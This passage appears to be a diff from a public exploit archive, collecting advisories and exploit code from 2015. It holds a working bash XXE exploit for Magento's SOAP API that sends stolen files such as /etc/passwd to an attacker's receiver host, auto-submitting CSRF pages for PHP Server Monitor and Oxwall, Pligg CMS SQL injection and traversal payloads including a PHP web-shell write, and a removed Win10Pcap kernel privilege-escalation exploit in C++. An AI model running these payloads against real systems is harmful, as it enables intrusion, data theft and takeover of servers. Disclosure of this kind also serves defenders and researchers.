# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
#
# Run the script with just the URL to Magento SOAP API, with no other parameters.
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index
#
#
# [File retrieval from the remote server]
#
# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT
#
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80
#
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# http://192.168.10.5:80/fetch.php?D=[base64_string]
# You should have the receiver server/script listening on the specified port before running this exploit.
#
TIMEOUT=6
PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml"
if [ $# -ne 1 ] && [ $# -ne 4 ] ; then
echo -e "\nUsage: \n"
echo -e "[Vulnerability test]\n"
echo -e "$0 MAGENTO_SOAP_API_URL"
echo -e "E.g:"
echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
echo -e "[File retrieval]\n"
echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT"
echo -e "E.g:"
echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n";
exit 2;
else
TARGETURL="$1"
fi
if [ $# -eq 4 ]; then
FILE="$2"
RECEIVER_HOST="$3"
RECEIVER_PORT="$4"
TEST_ONLY=0
else
TEST_ONLY=1
fi
# Perform only a test by reading /dev/random file
if [ $TEST_ONLY -eq 1 ]; then
# Vulnerability test mode XXE payload
TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [
<!ELEMENT PoC ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ns1="urn:Magento" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body><ns1:test>
<username xsi:type="xsd:string">user</username>
<apiKey xsi:type="xsd:string">key&xxe;</apiKey></ns1:test>
</SOAP-ENV:Body></SOAP-ENV:Envelope>'
echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"
# Fetching /dev/random should cause the remote script to block
# on reading /dev/random until the script times out.
# If there is no delay it means the remote script is not vulnerable or
# /dev/random is not accessible.
START=$(date +%s)
wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
END=$(date +%s)
DIFF=$(expr $END \- $START )
if [ $DIFF -eq $TIMEOUT ]; then
echo "Vulnerable. No response from Magento for $DIFF seconds :)"
exit 0
else
echo "Not vulnerable, or there is no /dev/random on the remote server."
exit 1
fi
fi
# File retrieval XXE payload
SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!ENTITY % all \"<!ENTITY send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
%all;"
SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`"
FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
<!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
%dtd;
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:ns1=\"urn:Magento\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"
SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<SOAP-ENV:Body><ns1:test>
<username xsi:type=\"xsd:string\">user</username>
<apiKey xsi:type=\"xsd:string\">key&send;</apiKey></ns1:test>
</SOAP-ENV:Body></SOAP-ENV:Envelope>"
# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
echo -e "Target URL: $TARGETURL\nInjecting XXE payload to retrieve the $FILE file... \n"
echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]"
echo -e "If in doubt, try the vulnerability test option."
wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
--------------------------------
The above exploit uses the Out of band XXE payload which sends
any retrieved data back to the attacker even though the attacker cannot
see the resulting file in the server's response directly.
This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend
Frameork which prohibits network access. This is achieved through the usage of
php://filter wrapper which is treated as a local resource by the XML ENTITY
handler even though it references remote resources.
Successful exploitation in a test mode ('Vulnerability test', exploit run
without parameters other than the URL to Magento SOAP API) will result in a
time out and an internal server error caused by the XML ENTITY accessing
/dev/random file which will block the API script.
For example:
---
$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting Test XXE payload (/dev/random). Might take a few seconds.
--2015-05-19 22:14:17-- http://vulnhost/magento/index.php/api/soap/index
Resolving precise (vulnhost)... 127.0.0.1
Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in
headers. Giving up.
Vulnerable. No response from Magento for 6 seconds :)
---
Arbitrary file accessible to the PHP process can also be fetched with the
above exploit by using the following syntax:
---
attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting XXE payload to retrieve the /etc/passwd file...
If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result]
If in doubt, try the vulnerability test option.
--2015-05-19 22:33:06-- http://vulnhost/magento/index.php/api/soap/index
Resolving vulnhost (vulnhost)... 192.168.57.12
Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in
headers. Giving up.
---
The result will be sent to attacker's server listening on port 9090 which
needs to be set up before running the exploit:
---
attacker# nc -vv -l 9090
Listening on [0.0.0.0] (family 0, port 9090)
Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)
GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0
Host: attackershost:9090
attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
---
It may also be possible to execute arbitrary commands on the remote server
if the remote PHP installation has the 'expect' module enabled.
In such case, an attacker could use expect:// wrapper within XML ENTITY
to execute any command in the context of the PHP process.
E.g:
<ENTITY % file SYSTEM "expect://id">
VI. BUSINESS IMPACT
-------------------------
This issue should be marked as high/critical due to the wide deployment of
eBay Magento software, low complexity of exploitation, as well as a possibility
of an unauthenticated remote exploitation as demonstrated in this advisory.
Authentication in case of SOAP is not required for exploitation
as the XML needs to be processed first in order to read credentials passed
within the XML, in a SOAP login method.
There is also a growing number of servers set up to serve PHP code with
PHP-FPM, especially in web hosting environments which need to respond to heavy
load.
There are official Magento tutorials explaining how to set up Magento with Nginx
and PHP FPM for best performance:
http://info.magento.com/rs/magentocommerce/images/
MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
VII. SYSTEMS AFFECTED
-------------------------
The versions of eBay Magento CE before 1.9.2.1 were confirmed to be exploitable
on an Apache web server with PHP-FPM SAPI, and a libxml library which processes
XML entities by default.
eBay Magento EE was not tested, but is also affected by this issue according
to the vendor. The fix for this issue is in Magento EE 1.14.2.2 according to
the APPSEC-1045 advisory.
PHP-FPM can be set up on popular web servers such as Apache, or Nginx
on Linux/Unix, as well as Windows systems (as per the 'fpm on cygwin' setup
guides available on the Internet).
VIII. SOLUTION
-------------------------
eBay Magento was informed about the issue and assigned it a reference ID of
APPSEC-1045. eBay released a patch bundle titled:
'SUPEE-6788 Patch Bundle'
prior to the release of this advisory.
To address the vulnerability, the patch should be installed, or Magento
should be upgraded to the latest version of 1.9.2.2 which already contains
the fix.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt
http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
http://framework.zend.com/security/advisory/ZF2015-06
Powering Magento with Ngnix and PHP-FPM:
http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
http://www.securiteam.com/
Official eBay Magento website:
http://magento.com/
Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML
Functionality Using Multibyte Payloads' (APPSEC-1045) is available at:
http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html
X. DISCOVERED BY
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
Oct 29th, 2015: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

100
platforms/php/webapps/38574.html Executable file
View file

@ -0,0 +1,100 @@
<!--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt
Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download
Product:
================================
PHP Server Monitor 3.1.1
Vulnerability Type:
=================================
Privilege Escalation / CSRF
Vulnerability Details:
=====================
PHP Server Monitor uses level 20 for basic user and level 10 for Admins these are stored in Database. Basic users can elevate thier privileges to that of Administrator
by crafting an HTTP payload changing their level to '10' then getting an Administrator to click an infected link or visit a malicious website to launch an
CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism in place.
Exploit code(s):
===============
1) privilege escalation / CSRF
-->
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="10">
<input type="text" name="password" value="">
<input type="text" name="password_repeat" value="">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>
</body>
</html>
<!--
Exploitation Technique:
=======================
Remote
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] PHP Server Monitor 3.1.1
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
-->

149
platforms/php/webapps/38577.txt Executable file
View file

@ -0,0 +1,149 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of
them does not require any credentials, and allows the direct extraction of data
from the database.
3. SQL Injection
Description
Pligg CMS is vulnerable to SQL injection. It is possible to extract data from
all databases that the pligg database user has access to.
Credentials are not required.
Proof Of Concept
http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23
Code
/story.php:168
if(isset($_GET['reply']) && !empty($parent_comment_id)){
$main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
$main_smarty->assign('parrent_comment_id',$parent_comment_id);
}
[...]
function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;
//Set comment order to 1 if it's not set in the admin panel
if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];
if (!isset($CommentOrder)) $CommentOrder = 1;
If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}
[...]
$comments = $db->get_results("SELECT *
FROM " . table_comments . "
WHERE (comment_status='published' $status_sql) AND
comment_link_id=$link->id AND comment_id = $comment_id
ORDER BY " . $CommentOrderBy);
4. Blind SQL Injection (Admin Area)
Description
There is a blind SQL Injection in the admin area of Pligg CMS. This allows an
attacker that gained admin credentials to extract data from the database.
The problem exists because the index of the submitted "enabled" POST array is
used in a query. The value is escaped - so using quotes in the injection is not
possible - but it does not place the value in between quotes.
Proof Of Concept
POST /pligg-cms-master/admin/admin_users.php HTTP/1.1
frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1
Code
// admin/admin_users.php
foreach($_POST["enabled"] as $id => $valuea)
{
$_GET['id'] = $id = $db->escape($id);
$user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");
5. Possibly SQL Injection
Description
The upload module is vulnerable to Blind SQL Injection via the "comment" as
well as "id" parameter.
The module seems to be unused at the moment, but if it were to be used in the
future, or if an attacker finds a different way to execute it, it would be
vulnerable.
The requests to trigger the vulnerabilities would be:
POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23
POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1<script' or 1%3D1%23></script>&number=1&comment=1
Code
./modules/upload/upload.php:
if ($_POST['id'])
{
$linkres=new Link;
$linkres->id = sanitize($_POST['id'], 3);
if(!is_numeric($linkres->id)) die("Wrong ID");
if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");
// Remove old file and thumbnails with same number
$sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";
The first problem is that $_POST[comment] is never sanitized.
The second problem is that $_POST['id'] is first sanitized by removing tags,
then it is checked if that result is nummeric, and finally the original POST
value is used. Because of this, it is possible to put the injection inside tags
to bypass the check.
6. Solution
This issue was not fixed by the vendor.
7. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html

46
platforms/php/webapps/38578.txt Executable file
View file

@ -0,0 +1,46 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
The editor delivered with Pligg CMS is vulnerable to directory traversal, which
gives an attacker that obtained admin credentials the opportunity to view any
file stored on the webserver that the webserver user has access to.
Please note that admin credentials are required.
3. Proof of Concept
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html

52
platforms/php/webapps/38579.txt Executable file
View file

@ -0,0 +1,52 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Pligg CMS 2.0.2
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://pligg.com/
Vulnerability Type: Code Execution & CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
The file editor provides the possibility to edit .tpl files stored in the
templates directory.
But the file editor is vulnerable to directory traversal when saving files, and
it does not check the submitted filename against a whitelist of allowed files.
It also does not check the file extension. Because of this, it is possible to
gain code execution.
Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.
3. Proof of Concept
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html

58
platforms/php/webapps/38581.txt Executable file
View file

@ -0,0 +1,58 @@
Advisory ID: HTB23266
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication: July 1, 2015 [without technical details]
Vendor Notification: July 1, 2015
Vendor Patch: September 8, 2015
Public Disclosure: October 22, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall, which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An attacker might be able to put the website under maintenance and perform XSS attacks against website visitors.
The vulnerability exists due to failure in the "/admin/pages/maintenance" script to properly verify the source of the HTTP request. A remote attacker can trick a logged-in administrator to visit a page with CSRF exploit and put the entire website under maintenance. Additionally, the attacker is able to inject arbitrary HTML and JavaScript code into maintenance message and execute it in browsers of any website visitor. Successful exploitation of this vulnerability may allow an attacker to steal other users cookies, spread malware to website visitors, and even obtain full control over vulnerable website.
A simple CSRF exploit below puts the website under maintenance and displays a JS popup with "ImmuniWeb" word to every website visitor:
<form action = "http://[host]/admin/pages/maintenance" method = "POST">
<input type="hidden" name="form_name" value="maintenance">
<input type="hidden" name="maintenance_enable" value="on">
<input type="hidden" name="save" value="Save">
<input type="hidden" name="maintenance_text" value="<script>alert('ImmuniWeb');</script>">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Oxwall 1.8
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23266 - https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on Oxwall.
[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy to use PHP/MySQL social networking software platform.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

205
platforms/windows/dos/38542.cpp
View file

@ -1,205 +0,0 @@
# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
/*
Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
*/
#include <stdio.h>
#include <tchar.h>
#include<Windows.h>
#include<stdio.h>
#include <winternl.h>
#include <intrin.h>
#include <psapi.h>
#include <strsafe.h>
#include <assert.h>
#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
/* found with :
!token
1: kd> dt nt!_OBJECT_HEADER
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : UChar
+0x00d TraceFlags : UChar
+0x00e InfoMask : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
TypeIndex is 0x5
*/
#define HANDLE_TYPE_TOKEN 0x5
// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
(SYSTEM_INFORMATION_CLASS)16;
// The NtQuerySystemInformation function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
// Undocumented structure: SYSTEM_HANDLE_INFORMATION
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
const FILE_INFORMATION_CLASS FileNameInformation =
(FILE_INFORMATION_CLASS)9;
// The NtQueryInformationFile function and the structures that it returns
// are internal to the operating system and subject to change from one
// release of Windows to another. To maintain the compatibility of your
// application, it is better not to use the function.
typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
// FILE_NAME_INFORMATION contains name of queried file object.
typedef struct _FILE_NAME_INFORMATION {
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
void* FindTokenAddressHandles(ULONG pid)
{
/////////////////////////////////////////////////////////////////////////
// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
//
// The functions have no associated import library. You must use the
// LoadLibrary and GetProcAddress functions to dynamically link to
// ntdll.dll.
HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
assert(hNtDll != NULL);
PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
"NtQuerySystemInformation");
assert(NtQuerySystemInformation != NULL);
/////////////////////////////////////////////////////////////////////////
// Get system handle information.
//
DWORD nSize = 4096, nReturn;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
HeapAlloc(GetProcessHeap(), 0, nSize);
// NtQuerySystemInformation does not return the correct required buffer
// size if the buffer passed is too small. Instead you must call the
// function while increasing the buffer size until the function no longer
// returns STATUS_INFO_LENGTH_MISMATCH.
while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
nSize += 4096;
pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
GetProcessHeap(), 0, nSize);
}
for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
{
printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
return pHandle->Object;
}
}
/////////////////////////////////////////////////////////////////////////
// Clean up.
//
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return 0;
}
void main()
{
DWORD dwBytesReturned;
DWORD ShellcodeFakeMemory;
HANDLE token;
// first create toke handle so find object address with handle
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
DebugBreak();
void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
CloseHandle(token);
// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(hDriver!=INVALID_HANDLE_VALUE)
{
fprintf(stderr," Open Driver OK\n");
if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
{
fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
return;
}
else fprintf(stderr," Send IOCTL OK\n");
}
else
{
fprintf(stderr," Open Driver error %d.\n",GetLastError());
return;
}
CloseHandle(hDriver);
getchar();
}